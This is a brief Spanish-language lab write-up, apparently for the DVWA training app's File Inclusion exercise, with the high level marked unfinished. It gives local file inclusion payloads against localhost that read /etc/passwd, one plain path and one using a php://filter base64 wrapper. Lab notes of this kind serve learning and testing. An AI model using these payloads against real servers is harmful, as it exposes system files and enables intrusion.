File Inclusion
Low Security Level
LFI:
localhost/vulnerabilities/fi/?page=/etc/passwd
Podemos listar el archivo /etc/passwd sin muchas complicaciones.
Medium Security Level
Malas practicas de seguridad.
LFI:
localhost/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=/etc/passwd
Nos dará el archivo codificado en base64, lo copiaremos y en nuestras shell, lo decodificaremos de la base64, y podremos visualizar el archivo /etc/passwd.
High Security Level
Malas prácticas más duras o alternativas.
NO COMPLETADO AUN!
Impossible Security Level
Segura contra todas las vulnerabilidades.
Última actualización